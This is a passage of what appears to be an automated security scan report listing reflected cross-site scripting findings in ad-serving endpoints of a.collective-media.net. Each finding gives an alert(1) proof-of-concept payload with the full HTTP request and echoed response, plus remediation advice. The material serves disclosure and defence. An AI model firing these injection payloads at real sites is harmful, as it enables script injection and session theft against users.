GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Capplehome%2F1%2FH.22.1%2Fs45228154349606%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D21%252F6%252F2011%252015%253A25%253A9%25204%2520300%26pageName%3Dapple%2520-%2520index%252Ftab%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.homepage%26c4%3DD%253Dg%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Capplehome%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dhomepage%253D1%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D723%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BWPI%2520Detector%25201.3%253BDefault%2520Plug-in%253B%26AQE%3D1b4827%0d%0a1a9ebdf4b81 &A2S=1;ord=1742714097 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.apple.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606?AQB=1&vvpr=true&&ndh=1&t=21%2F6%2F2011%2015%3A25%3A9%204%20300&pageName=apple%20-%20index%2Ftab%20(us)&g=http%3A%2F%2Fwww.apple.com%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.homepage&c4=D%3Dg&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Capplehome&c48=1&c49=D%3Ds_vi&c50=homepage%3D1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&AQE=1b4827 1a9ebdf4b81 &A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1311279927: Date: Thu, 21 Jul 2011 20:25:27 GMT Server: GFE/2.0 Content-Type: text/html
3. Cross-site scripting (reflected)
previous
next
There are 134 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.yearbook/ford_ron_071911
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73883'-alert(1)-'aea0893a815 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.yearbook73883'-alert(1)-'aea0893a815 /ford_ron_071911;sz=300x250;ord=1520731557? HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: cli=11fda490648f83c
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 459 Date: Thu, 21 Jul 2011 18:00:44 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook73883'-alert(1)-'aea0893a815 /ford_ron_071911;sz=300x250;net=cm;ord=1520731557;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.yearbook/ford_ron_071911
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bcfc'-alert(1)-'53d92bb185c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c ;sz=300x250;ord=1520731557? HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: cli=11fda490648f83c
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 459 Date: Thu, 21 Jul 2011 18:00:44 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c ;sz=300x250;net=cm;ord=1520731557;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.yearbook/ford_ron_071911
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2919b'-alert(1)-'05bcbf3a0e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5 =1 HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: cli=11fda490648f83c
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 463 Date: Thu, 21 Jul 2011 18:00:44 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5 =1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.yearbook/ford_ron_071911
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f83'-alert(1)-'2441cffc4b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5 HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: cli=11fda490648f83c
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 460 Date: Thu, 21 Jul 2011 18:00:44 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5 ;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/idgt.curse/idgtcoad
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee038'-alert(1)-'ff9be4c80be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.curseee038'-alert(1)-'ff9be4c80be /idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 485 Date: Sat, 23 Jul 2011 04:48:40 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curseee038'-alert(1)-'ff9be4c80be /idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/idgt.curse/idgtcoad
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d26e'-alert(1)-'fa2fdef4e1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e ;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 485 Date: Sat, 23 Jul 2011 04:48:40 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e ;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/idgt.curse/idgtcoad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'-alert(1)-'c56bbbc539a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a =1 HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 489 Date: Sat, 23 Jul 2011 04:48:40 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a =1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/idgt.curse/idgtcoad
Issue detail
The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b48'-alert(1)-'d9ff14e8a82 was submitted in the sec parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82 HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 486 Date: Sat, 23 Jul 2011 04:48:40 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82 ;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.boston/life
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8194'-alert(1)-'c19d349c966 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bostonb8194'-alert(1)-'c19d349c966 /life;sz=728x90;click0=;ord=1100566473? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 445 Date: Sat, 23 Jul 2011 13:48:17 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:17 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bostonb8194'-alert(1)-'c19d349c966 /life;sz=728x90;net=q1;ord=1100566473;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.boston/life
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b33bd'-alert(1)-'80c1110add4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4 ;sz=728x90;click0=;ord=1100566473? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 445 Date: Sat, 23 Jul 2011 13:48:17 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:17 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4 ;sz=728x90;net=q1;ord=1100566473;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.boston/life
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d913'-alert(1)-'3feb78746bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
